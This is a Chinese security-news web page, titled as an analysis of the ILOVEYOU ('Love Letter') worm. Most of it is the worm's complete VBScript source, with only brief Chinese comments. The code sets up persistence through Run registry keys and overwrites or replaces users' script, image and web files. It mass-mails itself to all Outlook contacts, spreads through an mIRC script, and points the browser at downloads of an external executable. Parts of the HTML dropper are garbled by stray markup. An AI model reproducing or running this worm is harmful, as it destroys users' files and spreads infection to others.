-
您的位置:首页 → 网络冲浪 → 病毒快报 → 爱虫病毒三分解析
爱虫病毒三分解析
时间:2004/10/8 16:42:00来源:本站整理作者:蓝点我要评论(2)
-
'关于Love Letter的分析
'****************************病毒介绍**************************************
'barok -loveletter(vbe)
'by: spyder/ispyder@mail.com/@GRAMMERSoft Group/
'Manila,Philippines
'Comments begining with ' added by The Hidden May 4 2000
'analysis:Robnih00d
'webside:www.chinaghost.net(幽灵小组)
'用于我学习WSH,呵呵
'****************************病毒开始**************************************
dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy, dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1) '[将病毒内容读取到file]
vbscopy=file.ReadAll'[把file内容存储到vbscopy,为了以后感染用]
'**************************************************************************
main()
Sub main()
On Error Resume Next
Dim wscr,rr
Set wscr=CreateObject("WScript.Shell")
'check the time out value for WSH
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")'[检查是否超时,防止操作超时造成的程序终止]
If (rr>=1) then
' Set script time out to infinity
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",
0, "REG_DWORD"
End if
'[获得系统目录(windows,system,temp)并把病毒自身copy到系统目录下]
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
'****************************************************************************
regruns()
html()
spreadtoemail()
listadriv()'[遍历驱动器]
end Sub
'****************************************************************************
sub regruns()'[本函数用于修改注册表达到保护病毒的作用]
On Error Resume Next
Dim num, downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread = "") then
downread = "c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe") = 1) Then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 Then'[随机修改IE的起始页面,用于下载病毒文件]
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe";;
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe";;
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe";;
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe";;
end if
end if
if (fileexist(downread & "\WIN-BUGSFIX.exe") = 0) Then'[同系统一起启动]
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX", downread & "\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "about:blank"
end if
end Sub
'********************************************************************************
sub listadriv'[遍历驱动器,可以参看MSDN的示例代码]
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path & "\")
end if
Next
listadriv = s
end Sub
'*********************************************************************************
sub infectfiles(folderspec) '[感染部分,将最开始部分的vbscopy,使用追加的形式写入]
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext = fso.GetExtensionName(f1.path)
ext = lcase(ext)
s = lcase(f1.name)
if (ext = "vbs") or (ext = "vbe") then
set ap = fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext = "js") or (ext = "jse") or (ext = "css") or _
(ext = "wsh") or (ext = "sct") or (ext = "hta") then
set ap = fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname = fso.GetBaseName(f1.path)
set cop = fso.GetFile(f1.path)
cop.copy(folderspec & "\" & bname & ".vbs")
fso.DeleteFile(f1.path)
elseif(ext = "jpg") or (ext = "jpeg") then
set ap=fso.OpenTextFile(f1.path, 2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path & ".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3 = fso.CreateTextFile(f1.path & ".vbs")
mp3.write vbscopy
mp3.close
set att = fso.GetFile(f1.path)
att.attributes = att.attributes + 2
end if
if (eq<>folderspec) then'[这里是通过IRC传播]
if (s = "mirc32.exe") or (s = "mlink32.exe") or (s = "mirc.ini") or _
(s = "script.ini") or (s = "mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine ";Please dont edit this script... mIRC will
corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not
run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com";;
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1=/if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2=/.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
'****************************************************************************
sub folderlist(folderspec)'[遍历目录]
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end Sub
'*****************************************************************************
sub regcreate(regkey,regvalue)'[写注册表的子程序]
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end Sub
'*****************************************************************************
function regget(value)'[读取注册表的子程序]
Set regedit = CreateObject("WScript.Shell")
regget = regedit.RegRead(value)
end function
'*****************************************************************************
function fileexist(filespec)'[判断文件是否存在]
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end Function
'*****************************************************************************
function folderexist(folderspec)'[判断目录是否存在]
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end Function
'*****************************************************************************
sub spreadtoemail()'[利用MAPI发邮件进行传播]
On Error Resume Next
dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad
set regedit = CreateObject("WScript.Shell")
set out = WScript.CreateObject("Outlook.Application")'[只是针对OUTLOOK]
set mapi = out.GetNameSpace("MAPI")
for ctrlists = 1 to mapi.AddressLists.Count'[不是地址本前N个人,而是ALL]
set a = mapi.AddressLists(ctrlists)
x = 1
regv = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a)
if (regv = "") then
regv = 1
end if
if (int(a.AddressEntries.Count) > int(regv)) then
for ctrentries = 1 to a.AddressEntries.Count
malead = a.AddressEntries(x)
regad = ""
regad = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" &
malead)
if (regad = "") then
set male = out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"'[邮件标题呵呵多么...]
male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from
me."
male.Attachments.Add(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead,
1, "REG_DWORD"
end if
x = x + 1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out = Nothing
Set mapi = Nothing
end Sub
'*****************************************************************************
sub html
On Error Resume Next
dim lines, n, dta1, dta2, dt1, dt2, dt3, dt4, l1, dt5, dt6
dta1= "LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@- <BR>@ <BR>CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ <BR> "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? <BR>@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ <BR> "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is <BR>good...@- <BR>@>"&vbcrlf& _ <BR> "<?-?HEAD><BODY onMOUSEOUT=@-@window.name=#-#main#-#;window.open(#- <BR>#LOVE- <BR>LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _ <BR> "onKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR- <BR>YOU.HTM#- <BR>#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ <BR> "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to <BR>read this HTML file<BR>- <BR>Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _ <BR> "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>---------- <BR>z------------ <BR>--------z----------<?-?MARQUEE> "&vbcrlf& _ <BR> "<?-?BODY><?-?HTML>"&vbcrlf& _ <BR> "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ <BR> "<!--?-??-?"&vbcrlf& _ <BR> "if (window.screen){var wi=screen.availWidth;var <BR>hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _ <BR> "?-??-?-->"&vbcrlf& _ <BR> "<?-?SCRIPT>"&vbcrlf& _ <BR> "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ <BR> "<!--"&vbcrlf& _ <BR> "on error resume next"&vbcrlf& _ <BR> "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ <BR> "aw=1"&vbcrlf& _ <BR> "code=" <BR> dta2= "set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ <BR> "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ <BR> "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ <BR> "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ <BR> "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ <BR> "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& <BR>_ <BR> "wri.write code4"&vbcrlf& _ <BR> "wri.close"&vbcrlf& _ <BR> "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ <BR> "if (err.number=424) then"&vbcrlf& _ <BR> "aw=0"&vbcrlf& _ <BR> "end if"&vbcrlf& _ <BR> "if (aw=1) then"&vbcrlf& _ <BR> "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ <BR> "window.close"&vbcrlf& _ <BR> "end if"&vbcrlf& _ <BR> "end if"&vbcrlf& _ <BR> "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ <BR> "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^- <BR>^Windows^- <BR>^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& <BR>_ <BR> "?-??-?-->"&vbcrlf& _ <BR> "<?-?SCRIPT>" <BR> dt1 = replace(dta1, chr(35) & chr(45) & chr(35), "'") <BR> dt1 = replace(dt1, chr(64) & chr(45) & chr(64), """") <BR> dt4 = replace(dt1, chr(63) & chr(45) & chr(63), "/") <BR> dt5 = replace(dt4, chr(94) & chr(45) & chr(94), "\") <BR> dt2 = replace(dta2, chr(35) & chr(45) & chr(35), "'") <BR> dt2 = replace(dt2, chr(64) & chr(45) & chr(64), """") <BR> dt3 = replace(dt2, chr(63) & chr(45) & chr(63), "/") <BR> dt6 = replace(dt3, chr(94) & chr(45) & chr(94), "\") <BR> set fso = CreateObject("Scripting.FileSystemObject") <BR> set c = fso.OpenTextFile(WScript.ScriptFullName, 1) <BR> lines = Split(c.ReadAll, vbcrlf) <BR> l1 = ubound(lines) <BR> for n = 0 to ubound(lines) <BR> lines(n)=replace(lines(n), "'", chr(91) + chr(45) + chr(91)) <BR> lines(n)=replace(lines(n), """", chr(93) + chr(45) + chr(93)) <BR> lines(n)=replace(lines(n), "\", chr(37) + chr(45) + chr(37)) <BR> if (l1 = n) then <BR> lines(n) = chr(34) + lines(n) + chr(34) <BR> else <BR> lines(n) = chr(34) + lines(n) + chr(34) & "&vbcrlf& _" <BR> end if <BR> next <BR> set b=fso.CreateTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM") <BR> b.close <BR> set d=fso.OpenTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM",2) <BR> d.write dt5 <BR> d.write join(lines, vbcrlf) <BR> d.write vbcrlf <BR> d.write dt6 <BR> d.close <BR>end Sub <BR>'***************************************************************************** <BR><BR></FONT><BR><BR>
</dd>
</dl>
<div id="xgsp"><p class="tit"><em>相关视频</em></p>
<div class="sp-wrap">
<ul class="clearfix">
<li><a href="/video/35627.html" target="_blank"><img src="https://thumb.jfcdns.com/n131f33y14414/7ef6220197161773.jpeg"><span>windows10自带扫雷游戏在哪</span></a></li><li><a href="/video/35608.html" target="_blank"><img src="https://thumb12.jfcdns.com/n331r1933t6b14n1e13/7ef621f2e386e59b.jpeg"><span>windows11专业版和家庭版的区别</span></a></li><li><a href="/video/35609.html" target="_blank"><img src="https://thumb.jfcdns.com/n3319v533e4014eln13/7ef621f2ef964d53.jpeg"><span>windows11家庭版和专业版有什么区别</span></a></li><li><a href="/video/35470.html" target="_blank"><img src="https://thumb2.jfcdns.com/n3315vb331dh13emv38/7ef621b17fd6b5e5.jpeg"><span>windows11我的电脑在哪里打开</span></a></li><li><a href="/video/35469.html" target="_blank"><img src="https://thumb12.jfcdns.com/n3313eu3330g1365f38/7ef621b16c26f688.jpeg"><span>windows11我的电脑在哪</span></a></li><li><a href="/video/35466.html" target="_blank"><img src="https://thumb10.jfcdns.com/n331xf6331dy13drs38/7ef621b10e146fcf.jpeg"><span>win11系统怎么退出微软账号</span></a></li><li><a href="/video/35091.html" target="_blank"><img src="https://thumb10.jfcdns.com/n231sp33cd134j22/7ef62061e5f02b61.jpeg"><span>win10ie打开变成edge</span></a></li><li><a href="/video/34798.html" target="_blank"><img src="https://thumb10.jfcdns.com/n331zf433u2x1212t36/7ef61efa5c1e0e6e.jpeg"><span>win11怎么设置默认浏览器</span></a></li><li><a href="/video/34683.html" target="_blank"><img src="https://thumb11.jfcdns.com/n2317533wl12ji32/7ef61ea73b416974.jpeg"><span>win11 ie浏览器在哪里</span></a></li><li><a href="/video/34071.html" target="_blank"><img src="https://thumb10.jfcdns.com/n131032w23h42/7ef61ce5b1bddfd3.jpeg"><span>windows11怎么连接wifi</span></a></li><li><a href="/video/34070.html" target="_blank"><img src="https://thumb10.jfcdns.com/n131q32823t42/7ef61ce5a5e38c81.jpeg"><span>windows11有必要升级吗</span></a></li><li><a href="/video/34069.html" target="_blank"><img src="https://thumb10.jfcdns.com/n131632l23o42/7ef61ce59b2d938d.jpeg"><span>windows11怎么把我的电脑放在桌面上</span></a></li><li><a href="/video/33644.html" target="_blank"><img src="https://thumb1.jfcdns.com/n331j1l32yg223ums26/7ef61b9add7dbd37.jpeg"><span>win10怎么隐藏任务栏</span></a></li><li><a href="/video/33524.html" target="_blank"><img src="https://thumb2.jfcdns.com/n331g1e3240e23utf23/7ef61b5b9fbe02f8.jpeg"><span>win10任务栏颜色怎么改</span></a></li><li><a href="/video/33520.html" target="_blank"><img src="https://thumb11.jfcdns.com/n331n4m32waz23w6023/7ef61b5b5c19d8a4.jpeg"><span>win10已禁用输入法怎么解决</span></a></li>
</ul>
</div>
</div>
<p id="lread">
<b class="tit"><em>相关阅读</em></b>
<span>
<i><a href="/infoview/Article_181275.html">Windows错误代码大全 Windows错误代码查询</a></i><i><a href="/edu/180591.html">激活windows有什么用</a></i><i><a href="/edu/142370.html">Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录</a></i><i><a href="/infoview/Article_140347.html">Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新</a></i><i><a href="/infoview/Article_136060.html">windows 10 rs4快速预览版17017下载错误问题</a></i><i><a href="/infoview/Article_133896.html">Win10秋季创意者更新16291更新了什么 win10 16291更新内容</a></i><i><a href="/infoview/Article_131339.html">windows10秋季创意者更新时间 windows10秋季创意者更新内容</a></i><i><a href="/infoview/Article_118674.html">kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么</a></i>
</span>
</p>
<dl id="commentBox"><dt class="tit"><i>文章评论</i></dt>
<dd id="comment">
<div id="comment-list">
<div id="hotCmt">
</div>
<dl>
</dl>
<p id="cmtNum-wrap"><a href="/comment_19079_1.html">查看所有<span id="cmtNum">2</span>条评论>></a></p>
</div>
<div id="comment-form">
<form action="/ajax.asp" method="post" id="cmtForm">
<fieldset>
<legend>发表评论</legend>
<input name="SoftID" type="hidden" id="softID" value="19079" />
<input name="CommentTpye" type="hidden" value="1" />
<input name="Action" type="hidden" value="2" />
<p id="userName-wrap"><input name="UserName" type="text" id="userName" class="input-bg grey9" maxLength="10" value="PC6网友" /></p>
<p><textarea name="content" id="cmtMsg" class="input-bor">我来说两句...</textarea></p>
<p><button type="submit" class="btn-submit button btnOrg fr" id="subCmt">提交评论</button></p>
</fieldset>
</form>
</div>
</dd><!-- #comment end -->
</dl>
</dt>
<dd id="cside">
<div class="adr"></div>
<p id="rpj">
<b class="tit"><em>热门文章</em></b>
<span>
没有查询到任何记录。
</span>
</p>
<p id="wj">
<b class="tit"><em>最新文章</em></b>
<span>
<i><a href="/infoview/Article_117749.html"><img src="https://thumb10.jfcdns.com/up/2017-6/201763985210286690.jpg" /><b>火球病毒是什么意思 火</b></a></i><i><a href="/infoview/Article_48651.html"><img src="https://thumb10.jfcdns.com/up/2010-8/2010813753329002.jpg" /><b>360保险箱如何保护程序</b></a></i>
</span>
<s>
<a href="/infoview/Article_53939.html" target="_blank">安卓手机病毒Android.KungFu来袭 用户小心流</a><a href="/infoview/Article_53277.html" target="_blank">lpk.dll是什么病毒_lpk.dll病毒专杀方法</a><a href="/infoview/Article_52862.html" target="_blank">BMW病毒技术深入分析</a><a href="/infoview/Article_52799.html" target="_blank">“图片大盗”通过聊天传播 专盗网游账号</a>
</s>
</p>
<p id="rwz">
<b class="tit"><em>人气排行</em></b>
<span>
<i><a href="/infoview/Article_40126.html" target="_blank">eset nod32序列号 nod32升级id 2009年8月28</a></i><i><a href="/infoview/Article_53277.html" target="_blank">lpk.dll是什么病毒_lpk.dll病毒专杀方法</a></i><i><a href="/infoview/Article_52204.html" target="_blank">最厉害病毒排行榜</a></i><i><a href="/infoview/Article_45273.html" target="_blank">职业盗号的基本流程</a></i><i><a href="/infoview/Article_43588.html" target="_blank">试图连接本机的IP端口,该操作被拒绝</a></i><i><a href="/infoview/Article_19042.html" target="_blank">VBS病毒制造机v1.0 分析报告</a></i><i><a href="/infoview/Article_48651.html" target="_blank">360保险箱如何保护程序和游戏账号</a></i><i><a href="/infoview/Article_31316.html" target="_blank">中搜.桌面传媒Deskipn专杀彻底删除办法</a></i>
</span>
</p>
</dd>
</dl>
<!--#include virtual="/include/footer/news_footer.html"-->
<script type="text/javascript"> var _webInfo = {};_webInfo={Username:"网络虫虫",Type:"1",DateTime:"2004/10/8 16:42:00",Id:"19079"};</script>
<script type="text/javascript" src="https://www.pc6.com/inc/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="https://www.pc6.com/js/nwz.js"></script>
<script type="text/javascript">
var pageClass=7;
//读取文章人气
ViewCmsHits('hits',19079);
$("#comment-list > dl > dd > p a:last-child").addClass("glBtn");
BindDing("#comment-list > dl > dd > p",19079,1);//顶
</script>
<script type="application/ld+json">
{
"@context": "https://zhanzhang.baidu.com/contexts/cambrian.jsonld",
"@id": "http://www.pc6.com/infoview/Article_19079.html",
"title": "爱虫病毒三分解析 _pc6资讯",
"description": ",爱虫病毒三分解析",
"pubDate": "2004-10-08T16:42:00",
"upDate": "2004-10-08T16:42:00",
"data":{
"WebPage":{
"pcUrl":"http://www.pc6.com/infoview/Article_19079.html",
"wapUrl":"https://m.pc6.com/n/19079",
"fromSrc":"pc6下载站"
}
}
}
</script>
</body>
</html>